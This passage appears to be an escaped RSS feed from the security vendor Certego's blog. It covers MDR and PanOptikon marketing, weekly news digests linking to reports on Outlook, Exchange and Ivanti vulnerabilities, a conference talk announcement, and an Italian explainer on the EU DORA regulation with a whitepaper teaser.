&lt;h3&gt;Flessibilità e scalabilità in linea con il business&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;I servizi di MDR offrono la flessibilità di scalare le operazioni di sicurezza in base alle mutevoli esigenze aziendali&lt;/strong&gt;. Questo significa che l&apos;investimento in sicurezza cresce in modo efficiente e proporzionato all&apos;espansione dell&apos;organizzazione, garantendo che le risorse siano sempre ottimizzate rispetto alle necessità attuali e future.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Esempio:&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;L’azienda &quot;GlobalManufacture&quot;, impegnata in un processo di espansione con l&apos;apertura di nuove sedi all&apos;estero, si trova ad affrontare la necessità di rivedere la propria strategia di sicurezza per adeguarla alle richieste di un&apos;azienda in crescita. L&apos;incremento delle sedi internazionali introduce sfide complesse, dalla gestione di un panorama di minacce in continua evoluzione alle esigenze specifiche di ogni nuovo mercato. La flessibilità dei servizi di MDR, che consente di modulare rapidamente e con vantaggi economici i livelli di servizio, offre a &quot;GlobalManufacture&quot; la possibilità di adeguarsi tempestivamente a queste dinamiche.

Questa strategia scalabile assicura che ogni investimento in sicurezza sia calibrato per garantire il massimo impatto, evitando sprechi di risorse o carenze in ambiti critici. In aggiunta, la versatilità fornita dai servizi di MDR sostiene la strategia di espansione globale di &quot;GlobalManufacture&quot;, assicurando che le politiche di sicurezza rimangano allineate con gli obiettivi di business e le normative locali in ogni nuova località, minimizzando così i rischi legali e operativi durante il processo di internazionalizzazione dell&apos;azienda.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In sintesi, i servizi di MDR rappresentano un pilastro fondamentale per rafforzare i livelli di cybersecurity e per assicurare il ritorno sugli investimenti in ambito IT, senza la necessità di ingenti investimenti interni. Estendono la capacità di un team di sicurezza di rilevare, analizzare, indagare e rispondere attivamente alle minacce, sfruttando piattaforme tecnologiche avanzate e l&apos;esperienza approfondita in materia di sicurezza. Questi servizi si adattano e crescono in base alle necessità aziendali, offrendo una risposta mirata alle minacce e liberando risorse per iniziative di business strategiche. Fornendo una copertura 24/7, migliorano la postura di sicurezza di un&apos;organizzazione, garantendo sempre difese aggiornate e di primo livello, consentendo alle aziende di navigare il complesso panorama della sicurezza informatica in modo più efficace e meno oneroso.&lt;/p&gt;
&lt;h3&gt;Certego MDR: la soluzione completa per le nuove sfide di Cybersecurity:&lt;/h3&gt;
&lt;p&gt;I servizi Certego di Managed Detection &amp;#x26; Response vengono erogati attraverso la piattaforma proprietaria o PanOptikon® che abilita le attività di monitoraggio in tempo reale, analisi e risposta degli incidenti, oltre all’interazione diretta tra il team IT del cliente e il Detection &amp;#x26; Response team di Certego.&lt;/p&gt;
&lt;p&gt;La piattaforma utilizza un approccio modulare per adattarsi all&apos;infrastruttura dell&apos;organizzazione e scalare in base alle nuove necessità.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.certego.net/platform/security-operations-platform/&quot;&gt;Scopri come migliorare i tuoi investimenti in cybersecurity con la piattaforma PanOptikon® e i servizi MDR di Certego&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Weekly Highlights - February 23th]]></title><description><![CDATA[News and cybercrime updates selected by Certego]]></description><link>https://www.certego.net/blog/weekly-highlights-february-23/</link><guid isPermaLink="false">weekly-highlights-february-23</guid><category><![CDATA[Blog]]></category><pubDate>Thu, 22 Feb 2024 23:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;European Commission presents new initiatives for digital infrastructures of tomorrow&lt;/h2&gt;
&lt;h3&gt;#Regulations&lt;/h3&gt;
&lt;p&gt;The iniziatives aim to shape the digital landscapes of the future by addressing the challenges posed by rapid technological advancement and increasing reliance on digital platforms.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://ec.europa.eu/commission/presscorner/detail/it/ip_24_941&quot;&gt;click to read the article&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;ECSO publishes the NIS2 Implementation Survey&lt;/h2&gt;
&lt;h3&gt;#Regulations&lt;/h3&gt;
&lt;p&gt;The survey aims to identify key challenges and priorities in implementing NIS2 and share results with relevant stakeholders.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://forms.office.com/pages/responsepage.aspx?id=zu7aB_B3YkqIL6ekzlAgVFh0VuJpEeFHnyYSvm4H5Y1UMFJFVEY5VDMwOFU1OTFUUDlBQ1NHWTZZTS4u&quot;&gt;click to read the article&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;CVE-2024-21413&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;Microsoft Outlook Remote Code Execution Vulnerability.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2024-21413&quot;&gt;click to read the article&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;CVE-2024-21410&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;Microsoft Exchange Server Elevation of Privilege Vulnerability.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2024-21410&quot;&gt;click to read the article&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;</content:encoded></item><item><title><![CDATA[OCSC 2024]]></title><description><![CDATA[Certego alla Open Cyber Security Conference di Tenerife]]></description><link>https://www.certego.net/blog/certego-alla-opne-cybersecurity-conference-di-tenerife/</link><guid isPermaLink="false">certego-alla-opne-cybersecurity-conference-di-tenerife</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><pubDate>Sun, 18 Feb 2024 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Certego è stata selezionata tra le aziende che parteciperanno in qualità di relatori alla &lt;strong&gt;Open Cyber Security Conference&lt;/strong&gt; di Tenerife, il Forum internazionale organizzato da &lt;strong&gt;FIRST&lt;/strong&gt;, &lt;strong&gt;TF-CSIRT&lt;/strong&gt; e &lt;strong&gt;Open CSIRT Foundation&lt;/strong&gt; per favorire lo scambio di obiettivi, idee e informazioni volte a elevare i livelli di sicurezza informatica.&lt;/p&gt;
&lt;p&gt;Martedì 27 febbraio, &lt;strong&gt;Matteo Lodi&lt;/strong&gt; e &lt;strong&gt;Simone Berni&lt;/strong&gt; di Certego presenteranno il talk &quot;&lt;strong&gt;IntelOwl - Making the Life of Security Analysts easier&lt;/strong&gt;&quot;, durante il quale verranno esplorati i vantaggi della soluzione di Certego IntelOwl per agevolare il lavoro quotidiano degli analisti di sicurezza informatica, consentendo loro di risparmiare tempo e aumentare l&apos;efficienza delle operazioni di cybersecurity.&lt;/p&gt;
&lt;p&gt;Certego è l&apos;unica azienda italiana selezionata per intervenire a questo significativo evento internazionale. Oltre a presentare la soluzione di &lt;strong&gt;Threat Intelligence&lt;/strong&gt; di Certego per per la raccolta e condivisione degli indicatori di compromissione (IOC) di terze parti, la conferenza rappresenta l’opportunità per consolidare la già solida collaborazione con il FIRST, il principale forum internazionale che riunisce i team di risposta agli incidenti di sicurezza informatica (CSIRTs) ed esperti di sicurezza di tutto il mondo.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Weekly Highlights - February 16th]]></title><description><![CDATA[News and cybercrime updates selected by Certego]]></description><link>https://www.certego.net/blog/weekly-highlights-february-16/</link><guid isPermaLink="false">weekly-highlights-february-16</guid><category><![CDATA[Blog]]></category><pubDate>Thu, 15 Feb 2024 23:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;NIST has published a practical guide for monitoring incoming data using the TLS 1.3 protocol&lt;/h2&gt;
&lt;h3&gt;#Researches&lt;/h3&gt;
&lt;p&gt;The new draft &lt;strong&gt;practice guide&lt;/strong&gt; can help companies in key industries use TLS 1.3 while performing required audits on incoming internet traffic.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.nist.gov/news-events/news/2024/01/new-nccoe-guide-helps-major-industries-observe-incoming-data-while-using&quot;&gt;click to read the article&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Hackers exploit Ivanti SSRF flaw to deploy new DSLog backdoor&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;The vulnerability, tracked as &lt;strong&gt;CVE-2024-21893&lt;/strong&gt;, was disclosed as an actively exploited zero-day on January 31, 2024.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/hackers-exploit-ivanti-ssrf-flaw-to-deploy-new-dslog-backdoor/?&amp;#x26;web_view=true&quot;&gt;click to read the article&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Microsoft Confirms Actively Exploited Security Flaw in Exchange Server&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;The security bug was exploited as a 0day before being fixed during this month&apos;s Patch Tuesday.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/microsoft-new-critical-exchange-bug-exploited-as-zero-day/&quot;&gt;click to read the article&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;German battery manufacturer Varta was forced to shut down its IT systems and stop production as a result of a cyberattack.&lt;/h2&gt;
&lt;h3&gt;#Breaches and Incidents&lt;/h3&gt;
&lt;p&gt;German news outlet Handelsblatt revealed that company’s share price fell by 4.75% after it announced the incident.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.helpnetsecurity.com/2024/02/15/varta-cyberattack/&quot;&gt;click to read the article&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;</content:encoded></item><item><title><![CDATA[Normativa DORA]]></title><description><![CDATA[Allinearsi alla Normativa UE con i servizi di Managed Detection & Response]]></description><link>https://www.certego.net/blog/dora-allinearsi-alla-normativa-ue-per-la-sicurezza-delle-organizzazioni-finanziarie/</link><guid isPermaLink="false">dora-allinearsi-alla-normativa-ue-per-la-sicurezza-delle-organizzazioni-finanziarie</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[NIS2]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Wed, 14 Feb 2024 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Summary&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;#1&quot;&gt;La Normativa DORA&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#2&quot;&gt;A chi si applica&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#3&quot;&gt;I 5 pilastri del regolamento DORA&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#4&quot;&gt;Certego&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#5&quot;&gt;Whitepaper&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;&lt;a id=&quot;1&quot;&gt;&lt;/a&gt; 1. La Normativa DORA&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Il Digital Operational Resilience Act (DORA) è la normativa dell&apos;Unione Europea progettata per accelerare le capacità di resilienza cibernetica delle istituzioni finanziarie&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;L&apos;obiettivo principale del DORA è prevenire e mitigare le minacce informatiche e garantire che le entità finanziarie possano resistere, rispondere e riprendersi da tutti i tipi di interruzioni e minacce legate all&apos;ICT.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Entro il 17 gennaio 2025&lt;/strong&gt;, gli Stati membri dell&apos;UE saranno tenuti a conformarsi a questa legge, che impone alle organizzazioni dei servizi finanziari di potenziare la loro risposta alle interruzioni operative, concentrando maggiormente l&apos;attenzione sulla resilienza e il recupero rispetto agli approcci tradizionali di individuazione e protezione.&lt;/p&gt;
&lt;p&gt;La normativa stabilisce requisiti uniformi per la sicurezza dei sistemi di rete e informazione che sostengono i processi aziendali delle entità finanziarie. Questi requisiti includono la gestione del rischio ICT, la gestione degli incidenti legati all&apos;ICT, la classificazione e la segnalazione, i test di resilienza operativa digitale, la condivisione di informazioni e intelligence sulle minacce informatiche e vulnerabilità, oltre a misure per la gestione del rischio associato ai fornitori di servizi ICT di terze parti.&lt;/p&gt;
&lt;br&gt;
&lt;h2&gt;&lt;a id=&quot;21&quot;&gt;&lt;/a&gt; 2. A chi si applica&lt;/h2&gt;
&lt;p&gt;La portata del Regolamento DORA è estremamente ampia e coinvolge quasi tutti gli operatori del settore finanziario.&lt;/p&gt;
&lt;p&gt;Le istituzioni finanziarie interessate, comprese banche, compagnie assicurative, società di investimento, scambi di criptovalute e piattaforme di trading, insieme ad altre organizzazioni che forniscono loro servizi critici, dovranno adeguarsi alla normativa per evitare multe che potrebbero raggiungere fino al 2% del loro fatturato annuo totale. L&apos;importo delle multe dipenderà dalla gravità delle violazioni e dalla cooperazione dell&apos;entità finanziaria con le autorità di regolamentazione.&lt;/p&gt;
&lt;br&gt;
&lt;h2&gt;&lt;a id=&quot;3&quot;&gt;&lt;/a&gt; 3. I 5 pilastri del regolamento DORA&lt;/h2&gt;
&lt;p&gt;Le società finanziarie dell&apos;UE sono tenute a conformarsi ai nuovi requisiti indicati secondo i seguenti cinque pilastri.&lt;/p&gt;
&lt;h3&gt;1. Gestione del rischio ICT:&lt;/h3&gt;
&lt;p&gt;Il quadro normativo DORA impone ai vertici aziendali la responsabilità di sovrintendere alla gestione delle tecnologie dell&apos;informazione e della comunicazione (ICT), definendo adeguate strategie di gestione del rischio e garantendone l’effettiva implementazione, nonchè l’aggiornamento.&lt;/p&gt;
&lt;p&gt;Le organizzazioni interessate sono tenute a sviluppare un &lt;strong&gt;framework di gestione del rischio IC&lt;/strong&gt;T che assicuri la mappatura dei sistemi informatici, l&apos;identificazione e la classificazione degli asset critici e la documentazione delle interdipendenze tra risorse, sistemi, processi e fornitori.&lt;/p&gt;
&lt;p&gt;È imperativo per queste organizzazioni condurre regolari valutazioni dei rischi ICT, segnalare e categorizzare le minacce alla sicurezza informatica e delineare strategie per arginare i rischi identificati.
Parte fondamentale di questo processo include l&apos;analisi dell&apos;impatto che specifici scenari di rischio e interruzioni potrebbero avere sulle operazioni aziendali, consentendo di stabilire livelli di rischio bassi e di adeguare di conseguenza l&apos;infrastruttura ICT.&lt;/p&gt;
&lt;p&gt;Parallelamente, è richiesto alle aziende di implementare robuste misure di sicurezza informatica, che comprendono protocolli per la gestione delle identità e degli accessi, l&apos;aggiornamento costante dei software e l&apos;integrazione di tecnologie all&apos;avanguardia quali software XDR, sistemi SIEM e soluzioni SOAR.&lt;/p&gt;
&lt;p&gt;Altrettanto cruciali sono lo sviluppo e l&apos;attuazione di piani di business continuity e di ripristino post-disastro per affrontare una vasta gamma di rischi informatici, dai guasti tecnici e catastrofi naturali ai cyberattacchi. Questi piani devono includere strategie efficaci di backup e recupero dati, procedure per il ripristino operativo dei sistemi e canali di comunicazione efficaci con clienti, partner commerciali e autorità di regolamentazione.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Come Certego può aiutare:&lt;/h3&gt;
La piattaforma PanOptikon è progettata come sistema unificato, per fornire un punto di controllo unico e sempre attivo sullo stato di sicurezza dei diversi ambienti IT e attivare procedure di Incident Response 24/7 in caso di eventuali anomalie riscontrate tramite le logiche di detection.&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;h3&gt;2. Reportistica degli incidenti ICT:&lt;/h3&gt;
&lt;p&gt;Le entità interessate sono chiamate ad adottare soluzioni in grado di monitorare, gestire, classificare e segnalare gli incidenti informatici. In base alla gravità dell’incidente, alle organizzazioni interessate potrebbe essere richiesto di informare sia le autorità normative che i clienti e i partner coinvolti.&lt;/p&gt;
&lt;p&gt;Per gli eventi di maggiore rilevanza, sarà obbligatorio fornire tre tipi di documentazione:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Rapporto iniziale&lt;/strong&gt;: subito dopo l&apos;identificazione di un incidente significativo, deve essere inviato un rapporto iniziale
alle autorità di vigilanza, fornendo dettagli preliminari sull&apos;incidente.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Rapporto intermedio&lt;/strong&gt;: a seconda dell&apos;evoluzione dell&apos;incidente e delle sue indagini, possono essere richiesti uno o più
rapporti intermedi per aggiornare le autorità sulle misure di mitigazione adottate e sul progresso della risoluzione.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Rapporto finale&lt;/strong&gt;: una volta risolto l&apos;incidente, un rapporto finale deve essere presentato per analizzare le cause, le
conseguenze, le misure di mitigazione adottate e le lezioni apprese. Questo rapporto può anche fornire
raccomandazioni per prevenire la ricorrenza di incidenti simili.&lt;/p&gt;
&lt;p&gt;I requisiti dettagliati di reportistica sotto la normativa DORA possono differire a seconda delle interpretazioni delle autorità nazionali e europee. Le entità devono quindi riferirsi alle regolamentazioni e alle linee guida specifiche vigenti per conformarsi pienamente agli obblighi di reportistica.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Come Certego può aiutare:&lt;/h3&gt;
La piattaforma PanOptikon consente la gestione end-to-end di un incidente informatico, fornendo informazioni dettagliate e report personalizzati per tutte le fasi dell’incidente, quali rilevamento, analisi, contenimento e risposta.&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;h3&gt;3. Test di resilienza digitale&lt;/h3&gt;
&lt;p&gt;Le organizzazioni sono chiamate ad eseguire test periodici sui propri sistemi informatici per verificare l&apos;efficacia delle misure di sicurezza e scoprire eventuali punti deboli. I risultati dei test svolti ed i piani adottati per affrontare eventuali debolezze di cybersecurity dovranno essere comunicati alle autorità competenti e da esse convalidati.&lt;/p&gt;
&lt;p&gt;È prevista annualmente l&apos;attuazione di test essenziali, come analisi di vulnerabilità e simulazioni basate su scenari specifici.&lt;/p&gt;
&lt;p&gt;Le istituzioni finanziarie ritenute strategiche per il sistema finanziario dovranno inoltre sottoporsi ogni tre anni a test di intrusione che simulino attacchi informatici (TLPT), coinvolgendo anche i loro fornitori di servizi ICT critici.&lt;/p&gt;
&lt;p&gt;Il framework richiesto dalla normativa DORA per lo svolgimento di questi test è il TIBER-EU (Threat Intelligence Based Etichal Red-Teaming) elaborato dalla BCE
nel 2018 e che Consob, insieme con Banca d’Italia e IVASS, ha contribuito a tradurre in un corrispondente framework a livello nazionale, il &lt;strong&gt;TIBER-IT&lt;/strong&gt;.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Come Certego può aiutare:&lt;/h3&gt;
La piattaforma PanOptikon è in grado di evidenziare eventuali configurazioni errate e/o lacune nei controlli di sicurezza esistenti e contribuisce ad identificare sistemi operativi e software obsoleti. Inoltre, può essere utilizzata per supportare un programma di test di sicurezza fornendo visibilità sui modelli di traffico.&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;h3&gt;4. Rischio ICT di terze parti&lt;/h3&gt;
&lt;p&gt;Il regolamento DORA estende la sua portata non solo alle istituzioni finanziarie ma anche ai fornitori di servizi ICT che operano all&apos;interno del settore finanziario.&lt;/p&gt;
&lt;p&gt;Si sottolinea l&apos;importanza per le istituzioni finanziarie di impegnarsi nella gestione dei rischi associati alle collaborazioni con terze parti nel settore ICT, soprattutto quando si tratta di affidare loro compiti critici.&lt;/p&gt;
&lt;p&gt;La legislazione prevede che non si possano instaurare rapporti di lavoro con fornitori di servizi ICT che non rispettano determinati standard di sicurezza e qualità, con le autorità vigenti pronte a intervenire in caso di accordi non conformi.&lt;/p&gt;
&lt;p&gt;Per quanto riguarda i fornitori di servizi ICT considerati fondamentali, questi saranno sottoposti a un controllo diretto da parte delle autorità di regolamentazione europee. La Commissione Europea è attualmente impegnata a definire i parametri che stabiliscono quali fornitori rientrino in questa categoria. A questi fornitori verrà assegnata un&apos;autorità di vigilanza designata, incaricata di assicurare che aderiscano ai requisiti di DORA e di prevenire accordi con entità che non sono in linea con il regolamento.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Come Certego può aiutare:&lt;/h3&gt;
La piattaforma PanOptikon può supportare il monitoraggio dei rischi di terze parti rilevando attività sospette o anomale che possono originare da una terza parte compromessa.&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;h3&gt;5. Condivisione delle informazioni&lt;/h3&gt;
&lt;p&gt;Il regolamento DORA richiede alle istituzioni finanziarie di implementare meccanismi di apprendimento dagli incidenti ICT, sia interni che esterni, promuovendo la partecipazione a iniziative di condivisione volontaria di informazioni su minacce informatiche. Le informazioni scambiate devono essere tutelate rispettando le normative pertinenti, inclusa la protezione dei dati personali secondo il GDPR.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Come Certego può aiutare:&lt;/h3&gt;
Attraverso un quadro di visibilità unificata e al monitoraggio continuo dell’infrastruttura IT, la piattaforma PanOptikon consente alle organizzazioni di esportare e condividere dati relative alle minacce, quali ad esempio ransomware e indicatori di compromissione, con altre entità finanziarie fidate.
La Threat Intelligence proprietaria di Certego consente inoltre di avere un quadro più approfondito in merito all’analisi delle minacce e delle vulnerabilità.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;a id=&quot;4&quot;&gt;&lt;/a&gt; 4. Certego&lt;/h2&gt;
&lt;p&gt;I servizi gestiti di Managed Detection &amp;#x26; Response erogati da Certego si basano su un modello adattivo che, partendo dalle attività di Prevenzione, è in grado di gestire ogni fase di un incidente informatico.&lt;/p&gt;
&lt;h3&gt;PanOptikon® Cybersecurity Platform&lt;/h3&gt;
&lt;p&gt;La piattaforma di cybersecurity PanOptikon® è la soluzione SaaS che consente di unificare in’unica soluzione la visibilità dei diversi ambienti IT, semplificare i processi di rilevamento e risposta agli attacchi e migliorare l’interazione tra il Security Operations Team di Certego e il cliente.&lt;/p&gt;
&lt;h3&gt;Security Operations Team&lt;/h3&gt;
&lt;p&gt;Il SecOps Team si compone di Analisti, Threat Hunter, Threat Researcher, Incident Responder, Forensics Analyst e Service Specialist per identificare, analizzare e rispondere alle minacce informatiche.&lt;/p&gt;
&lt;p&gt;Fornisce supporto tempestivo e raccomandazioni per il contenimento, l&apos;eradicazione, il ripristino e la resilienza 24/7/365.&lt;/p&gt;
&lt;h3&gt;Threat Intelligence&lt;/h3&gt;
&lt;p&gt;Un Team dedicato in grado di garantire informazioni in tempo reale sulle potenziali minacce, fornendo un dettaglio sulle motivazioni e le tattiche utilizzate dagli attaccanti.
Attraverso l’analisi delle TTP (Tactics, Techniques, Procedures) utilizzate dagli attaccanti, la piattaforma di intelligence sulle minacce di Certego fornisce al cliente dati aggiornati sulle più moderne minacce alla sicurezza informatica.
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;5&quot;&gt;&lt;/a&gt; 5. Whitepaper&lt;/h2&gt;
&lt;h3&gt;Scopri come i servizi di Managed Detection &amp;#x26; Response di Certego, erogati attraverso la piattaforma PanOptikon ti permettono, di essere conforme ai 5 pilastri normativi del regolamento DORA.&lt;/h3&gt;
&lt;p&gt;Il Whitepaper mostra un esempio pratico di come i servizi gestiti di cybersecurity erogati da Certego ti permettono di essere conforme agli obblighi di reposrtistica richiesti dalla Normativa DORA, in ogni fase di un attacco.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.certego.net/blog/whitepaper-dora/&quot;&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;
    &gt;
      &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 52.34375%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAC4jAAAuIwF4pT92AAACo0lEQVR42j2SWU+TURCGv1/kpXGLN4SAXmioAYSgKDGypaCAYlFMlLghaqIiUaqACFQ2iYCSuAAFFIFuKQVKilJKaSmlkK504/Hr5zLJm7zn5MyTOTMjhMNhbDYbi4uL+Hw+/kU8HhfPfsnPWazIHzZRrxrkeWs3jR19NHUNMLWwgtZix/DTjvGXA7NtHSESiUgwq3UFl8vF1tYWbrcbj8cjQRNhER8+be2l8+MoQ+MalO09vO7ux2R1iaA1zCtObM4N7K5NhO0tDy2vlAz0vaNb1U7/+/d0qFT09vTgcDpZs6+yvLaBzuLAtOzC8GudWesG5lW3CFpn0mhmfMaA0y0W4tlGcGxu0zQ0wpuv33n9aYLRyWkmxsdQq8fQaDSMjAxjXXWiNy+jWfjJjHmFH6KmF6ws2TdQ60z0ff2GNxDAK7ZIcO7s0mqPonLEUDnjLAV2pW/G4ruEQjui20Uzv0RNfRv32j5Q+2aQuhdvUfYPMzNv4YvRyJcfU7xTjzI4OoEQj8XYCQWJhHcIBQMEg0FJoVCIaDQmwYfGpjmUfp7UHDkNzV00PlNyraEJ9fdJnnR28uBlC8fOFpKamYfg8/swGAzodDo0Wq3k9XoDWq2OzU2PBBwY+UZ6XhFZ2WdQ3LpLZ3MLJbV1VNXcJ73wEsXVd5Cl57L3YLII9CWAevQ6PSbT3F+YFqNxFr0I93u9qLUGCssqKbtQTlLGKa5UVlNy4w7JGXlk5ldwMicfecll8ksVCNFoFK+YlAD7/X5JCZ/YwcR9ItTioDIzTpObe479R05QdLEKRU0dx08XcyS7gD0HUpDJslCIlQrSAGJxwuGolBwOR/7vXyz2p4efh8c4mpbN4ZQ0SiuuIlfcpKj8GtW3H3H93mP2JcnIyMqjoLiS33ZBiJ1TdQThAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Scarica il Whitepaper:&quot;
        title=&quot;&quot;
        src=&quot;/website/static/e55eaea9bf6711012aea38220640ace8/71c1d/Cover-whitepaper-dora.png&quot;
        srcset=&quot;/website/static/e55eaea9bf6711012aea38220640ace8/804b2/Cover-whitepaper-dora.png 384w,
/website/static/e55eaea9bf6711012aea38220640ace8/e5715/Cover-whitepaper-dora.png 768w,
/website/static/e55eaea9bf6711012aea38220640ace8/71c1d/Cover-whitepaper-dora.png 1536w,
/website/static/e55eaea9bf6711012aea38220640ace8/a878e/Cover-whitepaper-dora.png 2048w&quot;
        sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
    &lt;/span&gt;&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Allineamento alla Normative UE DORA]]></title><description><![CDATA[Come Certego può aiutare le organizzazioni finanziari a soddisfare gli standard dell'Unione Europea per la Resilienza Cyber]]></description><link>https://www.certego.net/blog/whitepaper-dora/</link><guid isPermaLink="false">whitepaper-dora</guid><category><![CDATA[Whitepaper]]></category><pubDate>Wed, 14 Feb 2024 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Entro il 17 gennaio 2025, gli Stati membri dell&apos;UE saranno tenuti a conformarsi a questa legge, che impone alle organizzazioni dei servizi finanziari di potenziare la loro risposta alle interruzioni operative, concentrando maggiormente l&apos;attenzione sulla resilienza e il recupero rispetto agli approcci tradizionali di individuazione e protezione.&lt;/p&gt;
&lt;p&gt;L&apos;obiettivo principale del DORA è prevenire e mitigare le minacce informatiche e garantire che le entità finanziarie possano resistere, rispondere e riprendersi da tutti i tipi di interruzioni e minacce legate all&apos;ICT.&lt;/p&gt;
&lt;p&gt;Le istituzioni finanziarie interessate, comprese banche, compagnie assicurative, società di investimento, scambi di criptovalute e piattaforme di trading, insieme ad altre organizzazioni che forniscono loro servizi critici, dovranno adeguarsi alla normativa per evitare multe che potrebbero raggiungere fino al 2% del loro fatturato annuo totale.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;In questo Whitepaper mostriamo un esempio pratico di come i servizi gestiti di Managed Detection $ Response di Certego di Certego ti permettono di essere conforme ai 5 pilastri della Normativa. In più trovi un esempio pratico di come la piataforma PanOptikon di permette di avere reportistica dettagliata di tutte le fasi di un incidente informatico, come richiesto dalla Normativa DORA.&lt;/strong&gt;.&lt;/p&gt;
